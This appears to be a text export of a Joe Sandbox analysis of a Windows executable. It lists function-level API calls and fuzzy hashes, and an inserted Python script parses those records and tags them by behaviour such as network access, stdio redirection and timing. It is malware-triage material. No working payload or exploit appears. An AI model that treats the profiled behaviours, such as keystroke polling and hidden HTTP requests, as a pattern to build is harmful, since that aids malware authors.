                                                                                                                      • Opcode Fuzzy Hash: 328e7bcd323d6b66403081fd01ab62f19e5abb6eb4241dad6e9688182c8d0abb
                                                                                                                      • Instruction Fuzzy Hash: A3215B75200205ABEF104FA4DC84FFA7BA9FB5A36CF108A29FA1493191D7719C51A762
                                                                                                                      APIs
                                                                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00526DBC
                                                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00526DEF
                                                                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00526E01
                                                                                                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00526E3B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateHandle$FilePipe
                                                                                                                      • String ID: nul
                                                                                                                      • API String ID: 4209266947-2873401336
                                                                                                                      • Opcode ID: f8404999ff03e451b4899ea8c88c8ad9379f27997c5dd4ba7e8d4024c4f03f1c
                                                                                                                      • Instruction ID: 53253bf57b6af2f080160eb9fa3c722483a1caa54d9c914c0955057b62eb2544
                                                                                                                      • Opcode Fuzzy Hash: f8404999ff03e451b4899ea8c88c8ad9379f27997c5dd4ba7e8d4024c4f03f1c
                                                                                                                      • Instruction Fuzzy Hash: 7221A47560022AABDB209F39EC04A9A7FF8FF96720F204A19FCA1D72D0D7709954DB50
                                                                                                                      APIs
                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00526E89
                                                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00526EBB
                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00526ECC
                                                                                                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00526F06
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateHandle$FilePipe
                                                                                                                      • String ID: nul
                                                                                                                      • API String ID: 4209266947-2873401336
                                                                                                                      • Opcode ID: eacce4f6d80b7c8c3dd0846a24da2c6680b6ea8a575c4dfa3414b34844ab0b94
                                                                                                                      • Instruction ID: 620ca4fe45c19f2490cc4b02f05739296972ac1acca9adfb1a4bc7f80ec18a40
                                                                                                                      • Opcode Fuzzy Hash: eacce4f6d80b7c8c3dd0846a24da2c6680b6ea8a575c4dfa3414b34844ab0b94
                                                                                                                      • Instruction Fuzzy Hash: 072162795003259BDB209F69EC44A9B7BA8FF56734F200A19FCA1E72D0D770A855CB50
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0052AC54
                                                                                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0052ACA8
                                                                                                                      • __swprintf.LIBCMT ref: 0052ACC1
                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,0054F910), ref: 0052ACFF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                      • String ID: %lu
                                                                                                                      • API String ID: 3164766367-685833217
                                                                                                                      • Opcode ID: 0a17bb95439294dcc9e155353621f95d1052ec16b5a0db7af8baf4b14b622ea4
                                                                                                                      • Instruction ID: 3db0aa373a0e187d7e2acad807128f7554d66129bdd88954bdfd5b935079e1e6
                                                                                                                      • Opcode Fuzzy Hash: 0a17bb95439294dcc9e155353621f95d1052ec16b5a0db7af8baf4b14b622ea4
                                                                                                                      • Instruction Fuzzy Hash: 2F219234A00109AFCB10DF69D945EEE7BB8FF89318B0040ADF909AB251DA35EE41DB21
                                                                                                                      APIs
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0051FCED,?,00520D40,?,00008000), ref: 0052115F
                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0051FCED,?,00520D40,?,00008000), ref: 00521184
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0051FCED,?,00520D40,?,00008000), ref: 0052118E
                                                                                                                      • Sleep.KERNEL32(?,?,?,?,?,?,?,0051FCED,?,00520D40,?,00008000), ref: 005211C1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CounterPerformanceQuerySleep
                                                                                                                      • String ID: @R
                                                                                                                      • API String ID: 2875609808-3205503559
                                                                                                                      • Opcode ID: dbe3e653b2fb9bb4efa346623e1904306b67009c62f4d5c682eab157ee0c1f88
                                                                                                                      • Instruction ID: f1863c7d896154a4ea75a486766f2a3a43fac78a86c0f66b77e10e506a45e327
                                                                                                                      • Opcode Fuzzy Hash: dbe3e653b2fb9bb4efa346623e1904306b67009c62f4d5c682eab157ee0c1f88
                                                                                                                      • Instruction Fuzzy Hash: 5C112E36D0092DE7CF009FA5E8486EEBFB8FF2A711F014455EA45B2280CB7055A4DB9A
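                                                                                                                       Added example, not part of the Joe Sandbox report: a small Python parser for the per-function "APIs / Similarity" records shown in this section, turning them into structured data so the API-call patterns can be triaged in bulk instead of read one record at a time. The embedded SAMPLE is a reduced copy of three records from this page (the WININET request, the stdio-to-nul redirection and the QueryPerformanceCounter/Sleep loop, with most dump-source lines dropped); the behaviour tags it assigns (network, stdio_redirect, timing, process_inspection) are our own triage heuristics, not a classification the report makes.

```python
"""Parse Joe Sandbox "APIs / Similarity" function records (plain-text export)
into structured data and tag each function by the behaviour its API calls hint at."""
import re
from typing import Dict, List, Set

# One "• Api.MODULE(args), ref: ADDR" line; callee lines carry the report's
# "Part of subcall function XXXXXXXX:" prefix. Args are optional (e.g. _memmove.LIBCMT).
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
# The identifier lines of the "Similarity" block.
FIELD_RE = re.compile(
    r"^•\s*(?P<key>API ID|String ID|API String ID|Opcode ID|Instruction ID):\s*(?P<val>.*)$"
)


def parse_records(text: str) -> List[Dict]:
    """Split the export at each 'APIs' header and collect API lines and IDs per record."""
    records: List[Dict] = []
    rec = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            rec = {"apis": [], "api_id": "", "string_id": "",
                   "api_string_id": "", "opcode_id": "", "instruction_id": ""}
            records.append(rec)
            continue
        if rec is None or not line:
            continue
        m = API_RE.match(line)
        if m:
            rec["apis"].append({
                "name": m["name"], "module": m["module"], "ref": m["ref"],
                "args": m["args"].split(",") if m["args"] is not None else [],
                "subcall": m["sub"],  # None for calls made directly by this function
            })
            continue
        f = FIELD_RE.match(line)
        if f:
            rec[f["key"].lower().replace(" ", "_")] = f["val"].strip()
    return records


def tag_record(rec: Dict, include_subcalls: bool = False) -> Set[str]:
    """Constructed triage heuristics over the API names/modules of one function."""
    calls = [a for a in rec["apis"] if include_subcalls or a["subcall"] is None]
    names = {a["name"] for a in calls}
    modules = {a["module"] for a in calls}
    tags: Set[str] = set()
    if modules & {"WININET", "WINHTTP", "WS2_32"}:
        tags.add("network")
    if "PSAPI" in modules or "OpenProcess" in names:
        tags.add("process_inspection")
    if {"CreatePipe", "GetStdHandle"} <= names:
        tags.add("stdio_redirect")
    if {"QueryPerformanceCounter", "Sleep"} <= names:
        tags.add("timing")
    return tags


def summarize(text: str) -> List[Dict]:
    """One row per function: truncated Opcode ID, tags, and direct API calls."""
    return [{"opcode_id": r["opcode_id"][:16], "tags": sorted(tag_record(r)),
             "apis": [a["name"] for a in r["apis"] if a["subcall"] is None]}
            for r in parse_records(text)]


# Reduced copy of three records from this page (constructed sample input).
SAMPLE = """\
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0053184C
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00531872
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 005318A2
• InternetCloseHandle.WININET(00000000), ref: 005318E9
  • Part of subcall function 00532483: GetLastError.KERNEL32(?,?,00531817,00000000,00000000,00000001), ref: 00532498
  • Part of subcall function 00532483: SetEvent.KERNEL32(?,?,00531817,00000000,00000000,00000001), ref: 005324AD
Strings
Similarity
• API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
• String ID:
• API String ID: 3113390036-3916222277
• Opcode ID: c0bc3d047b90be90ab3d585683236e2ae943bef9fc09ded57d28fd3dee6dc340
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 00526DBC
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00526DEF
• GetStdHandle.KERNEL32(0000000C), ref: 00526E01
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00526E3B
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• Opcode ID: f8404999ff03e451b4899ea8c88c8ad9379f27997c5dd4ba7e8d4024c4f03f1c
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0051FCED,?,00520D40,?,00008000), ref: 0052115F
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,0051FCED,?,00520D40,?,00008000), ref: 00521184
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID: @R
• Opcode ID: dbe3e653b2fb9bb4efa346623e1904306b67009c62f4d5c682eab157ee0c1f88
"""

if __name__ == "__main__":
    for row in summarize(SAMPLE):
        print(row["opcode_id"], row["tags"], row["apis"])
```

                                                                                                                       Feed it the whole text export of a report (everything from the first "APIs" header onward) and filter on the tags; subcall lines are kept but excluded from tagging by default so that a function is not labelled for what its callees do, and the Opcode ID prefix gives a stable key for matching the same function across reports.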
                                                                                                                      APIs
                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00521B19
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharUpper
                                                                                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                      • API String ID: 3964851224-769500911
                                                                                                                      • Opcode ID: 820016293cf60de5e48a2514b77e7608d4b7cc3bc237dc324b4509b833a2e378
                                                                                                                      • Instruction ID: 49baea77dc69d6017d92b7cd13d3c2abdf948b77847560ae14c47beabb3bd7bc
                                                                                                                      • Opcode Fuzzy Hash: 820016293cf60de5e48a2514b77e7608d4b7cc3bc237dc324b4509b833a2e378
                                                                                                                      • Instruction Fuzzy Hash: FD11A1349401989FCF00EF95E8518FFBBB4FF36308B1084A9D86867691EB325D46DB58
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0053EC07
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 0053EC37
• GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0053ED6A
• CloseHandle.KERNEL32(?), ref: 0053EDEB
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: Process$CloseCountersHandleInfoMemoryOpen
• String ID:
• API String ID: 2364364464-0
• Opcode ID: a70d9f7ce2a2f5b8008ca1218abbf3ea91b68dd3e007aa1cd76bc9534c53f63b
• Instruction ID: 506d17b3080672e4705e73f7aaae019f9653cc0896b5afab4d2b41a1f02df206
• Opcode Fuzzy Hash: a70d9f7ce2a2f5b8008ca1218abbf3ea91b68dd3e007aa1cd76bc9534c53f63b
• Instruction Fuzzy Hash: 64819175600300AFD760EF29C846F2ABBE5BF84714F04881EF99ADB2D2DA74AC45CB55
APIs
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
• String ID:
• API String ID: 1559183368-0
• Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
• Instruction ID: 734ba8ca51025cf985295fe290775e652525441f99c27da5dab604a8035bee97
• Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
• Instruction Fuzzy Hash: E951BC30A00B85EBCB148F67D84066F77B6AF4032AF14472FF425963D5D7789D518B49
APIs
  • Part of subcall function 004C7DE1: _memmove.LIBCMT ref: 004C7E22
  • Part of subcall function 00540E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0053FDAD,?,?), ref: 00540E31
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005400FD
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0054013C
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00540183
• RegCloseKey.ADVAPI32(?,?), ref: 005401AF
• RegCloseKey.ADVAPI32(00000000), ref: 005401BC
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
• String ID:
• API String ID: 3440857362-0
• Opcode ID: aa1431b9d9f00d72963a11434be7365bfa544f8778c3797e224185047a6a9d5d
• Instruction ID: 8423cfd1a779d7714bd5ead9b45170c3a32615a1ff82d0cc6fbf7b150c20e38f
• Opcode Fuzzy Hash: aa1431b9d9f00d72963a11434be7365bfa544f8778c3797e224185047a6a9d5d
• Instruction Fuzzy Hash: F7515C71208204AFD704EF68CC85FAABBE9FF84318F50591DF55587291DB35E944CB52
APIs
  • Part of subcall function 004C9837: __itow.LIBCMT ref: 004C9862
  • Part of subcall function 004C9837: __swprintf.LIBCMT ref: 004C98AC
• LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0053D927
• GetProcAddress.KERNEL32(00000000,?), ref: 0053D9AA
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0053D9C6
• GetProcAddress.KERNEL32(00000000,?), ref: 0053DA07
• FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0053DA21
  • Part of subcall function 004C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00527896,?,?,00000000), ref: 004C5A2C
  • Part of subcall function 004C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00527896,?,?,00000000,?,?), ref: 004C5A50
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
• String ID:
• API String ID: 327935632-0
• Opcode ID: 0b49028d4c656d27fababc377116ad516edc87417ddb64d4b1b9c314e555fa26
• Instruction ID: ca7fa588d25ae7b85b6817746e0a20265bea3daf6b4162f5b0c863b0675a96bf
• Opcode Fuzzy Hash: 0b49028d4c656d27fababc377116ad516edc87417ddb64d4b1b9c314e555fa26
• Instruction Fuzzy Hash: EC511879A00205DFCB40EFA9D484EADBBB5FF19324F04806AE855AB312D735AD45CF60
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0052E61F
• GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0052E648
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0052E687
  • Part of subcall function 004C9837: __itow.LIBCMT ref: 004C9862
  • Part of subcall function 004C9837: __swprintf.LIBCMT ref: 004C98AC
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0052E6AC
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0052E6B4
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
• String ID:
• API String ID: 1389676194-0
• Opcode ID: c2aef35bbfc4c4f5976fb72021e01736b179cad06c75ef660c09d89514e2d44d
• Instruction ID: 0c77916664fa1182dae4dda4c2c51f86c939e1f37ac062d1262c12abd1866ac7
• Opcode Fuzzy Hash: c2aef35bbfc4c4f5976fb72021e01736b179cad06c75ef660c09d89514e2d44d
• Instruction Fuzzy Hash: 77512839A00105EFCB40EF65D985EADBBF5FF09318B1480A9E809AB361CB35ED50DB64
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3a5b60d9aa9eddc799fb7d352066fad0d87dbe2c4790b9f6b5cc6683e4c3c9d4
• Instruction ID: ffe53773d988341d87e48717e0fde54180f906f7c74634712d9a650b3026ee45
• Opcode Fuzzy Hash: 3a5b60d9aa9eddc799fb7d352066fad0d87dbe2c4790b9f6b5cc6683e4c3c9d4
• Instruction Fuzzy Hash: 37412439984104AFD760DF28CC48FEABFA8FB09318F140565F81AA72E1C730AD44EB51
APIs
• GetCursorPos.USER32(?), ref: 004C2357
• ScreenToClient.USER32(005857B0,?), ref: 004C2374
• GetAsyncKeyState.USER32(00000001), ref: 004C2399
• GetAsyncKeyState.USER32(00000002), ref: 004C23A7
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID:
• API String ID: 4210589936-0
• Opcode ID: 9882b38bbddb647dc3da7f7c7e16038418552cc16ee71337d9fb72b3e8597e32
• Instruction ID: 9504c73f6274b7de0d472a140a327be7b74bfdac62fdbc5a4e7f7c74ef505c71
• Opcode Fuzzy Hash: 9882b38bbddb647dc3da7f7c7e16038418552cc16ee71337d9fb72b3e8597e32
• Instruction Fuzzy Hash: C9419239604109FFCF159F68C944FEABB74FB05364F20431AF825922A0CB789955DB95
                                                                                                                      APIs
                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005163E7
                                                                                                                      • TranslateAcceleratorW.USER32(?,?,?), ref: 00516433
                                                                                                                      • TranslateMessage.USER32(?), ref: 0051645C
                                                                                                                      • DispatchMessageW.USER32(?), ref: 00516466
                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00516475
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: Message$PeekTranslate$AcceleratorDispatch
• String ID:
• API String ID: 2108273632-0
APIs
• GetWindowRect.USER32(?,?), ref: 00518A30
• PostMessageW.USER32(?,00000201,00000001), ref: 00518ADA
• Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00518AE2
• PostMessageW.USER32(?,00000202,00000000), ref: 00518AF0
• Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00518AF8
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
APIs
• IsWindowVisible.USER32(?), ref: 0051B204
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0051B221
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0051B259
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0051B27F
• _wcsstr.LIBCMT ref: 0051B289
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
• String ID:
• API String ID: 3902887630-0
APIs
  • Part of subcall function 004C2612: GetWindowLongW.USER32(?,000000EB), ref: 004C2623
• GetWindowLongW.USER32(?,000000F0), ref: 0054B192
• SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0054B1B7
• SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0054B1CF
• GetSystemMetrics.USER32(00000004), ref: 0054B1F8
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00530E90,00000000), ref: 0054B216
Similarity
• API ID: Window$Long$MetricsSystem
• String ID:
• API String ID: 2294984445-0
APIs
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00519320
  • Part of subcall function 004C7BCC: _memmove.LIBCMT ref: 004C7C06
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00519352
• __itow.LIBCMT ref: 0051936A
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00519392
• __itow.LIBCMT ref: 005193A3
Similarity
• API ID: MessageSend$__itow$_memmove
• String ID:
• API String ID: 2983881199-0
APIs
• IsWindow.USER32(00000000), ref: 00535A6E
• GetForegroundWindow.USER32 ref: 00535A85
• GetDC.USER32(00000000), ref: 00535AC1
